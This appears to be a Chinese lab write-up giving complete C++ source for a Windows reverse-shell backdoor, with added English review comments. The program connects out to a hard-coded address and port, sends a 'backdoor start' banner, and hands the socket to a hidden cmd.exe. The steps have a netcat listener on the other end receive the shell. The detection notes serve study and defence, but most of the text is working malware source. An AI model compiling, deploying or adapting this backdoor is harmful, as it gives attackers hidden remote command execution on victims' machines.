零管道返回cmdshell
192.168.139.128 为虚拟机的 IP 地址。
实验步骤:
1. 在虚拟机中开启 nc -l -v -p 8888 进行监听
2. 运行编译好的程序
虚拟机就会得到实体机的cmd了....
// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "WS2_32.lib") // 链接到WS2_32.lib
// Launches cmd.exe from the system directory with the already-connected
// socket `s` inherited as the child's stdin/stdout/stderr, then blocks until
// that cmd.exe exits. "Zero pipe" (page title) means no anonymous pipes and
// no relay loop: the SOCKET handle itself is handed to the child as its
// std handles.
// NOTE(review): from a detection standpoint the observable pattern is a
// cmd.exe created with bInheritHandles=TRUE and STARTF_USESTDHANDLES whose
// std handles are socket objects rather than console or pipe handles.
//
// @param s  connected TCP socket; ownership stays with the caller — nothing
//           in this function closes it.
void cmdshell(SOCKET s)
{
// Build "<system dir>\cmd.exe". The return value of GetSystemDirectory is
// not checked, and the strcat is unbounded: it relies on the directory path
// being at least 8 characters shorter than MAX_PATH.
char szSysDir[MAX_PATH] = {0};
GetSystemDirectory(szSysDir, MAX_PATH);
strcat(szSysDir, "\\cmd.exe");
// Start from this process's own STARTUPINFO, then override the window mode
// and the std handles.
STARTUPINFO si = {0};
GetStartupInfo(&si);
// STARTF_USESHOWWINDOW + SW_HIDE: the child's console window is hidden.
// STARTF_USESTDHANDLES: the hStd* fields set below are used by the child.
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
// Relies on a Winsock SOCKET being usable as a kernel object handle; the
// C-style cast converts the SOCKET (UINT_PTR) to HANDLE (void*).
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
PROCESS_INFORMATION pi = {0};
// lpApplicationName is NULL, so szSysDir doubles as the (writable) command
// line. bInheritHandles is `true` (converted to BOOL) so the socket handle
// is visible inside the child. The return value is not checked: on failure
// pi.hProcess stays NULL (pi is zero-initialized) and the wait below fails
// immediately instead of blocking.
::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );
// Block until the shell process exits. pi.hProcess and pi.hThread are never
// closed, so both handles live until this process terminates.
::WaitForSingleObject(pi.hProcess, INFINITE);
}
// Entry point: initialises Winsock, connects to the hard-coded listener
// (the lab VM address and port given at the top of the page), sends a fixed
// banner, then hands the socket to cmdshell(). argc/argv are unused.
//
// @return 0 after cmdshell() returns (i.e. after cmd.exe exits), -1 on any
//         Winsock setup, connect or send failure. No cleanup (closesocket,
//         WSACleanup) is performed on any path.
int main(int argc, char* argv[])
{
// 512-byte zeroed buffer; only the first 14 bytes carry text. The send()
// below transmits sizeof(MyMessage) == 512 bytes, so the banner goes out
// NUL-padded to exactly 512 bytes — a fixed on-the-wire prefix for this
// connection.
char MyMessage[512] = {0};
strcpy(MyMessage, "backdoor start");
// Initialise WS2_32.dll, requesting Winsock 2.2.
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2, 2);
if(::WSAStartup(sockVersion, &wsaData) != 0)
{
return -1;
}
// WSASocket with lpProtocolInfo NULL and dwFlags 0, i.e. a socket created
// without WSA_FLAG_OVERLAPPED. NOTE(review): presumably chosen (rather than
// plain socket()) so the handle behaves as a synchronous std handle in the
// child — confirm.
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if (s == INVALID_SOCKET)
{
return -1;
}
// Destination is a compile-time constant: sin is not zero-initialized
// (sin_zero is left as-is), and inet_addr's INADDR_NONE result on a bad
// string is not checked. The literal address and port are what a defender
// would find by string-scanning the compiled binary.
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(8888);
sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");
// connect() reports failure as SOCKET_ERROR, which equals -1.
if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 )
{
// Winsock errors are normally read with WSAGetLastError(); here
// GetLastError() is used and nErr is assigned but never read.
int nErr = GetLastError();
return -1;
}
// Sends the full 512-byte buffer (text plus NUL padding), not strlen().
if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR)
{
printf("send error");
return -1;
}
// Blocks for as long as the spawned cmd.exe lives (see cmdshell()).
cmdshell(s);
// Reached only after cmd.exe exits. printf writes to this process's own
// stdout — the socket was redirected only for the child — and the socket
// is still open here.
printf("Hello World!\n");
return 0;
}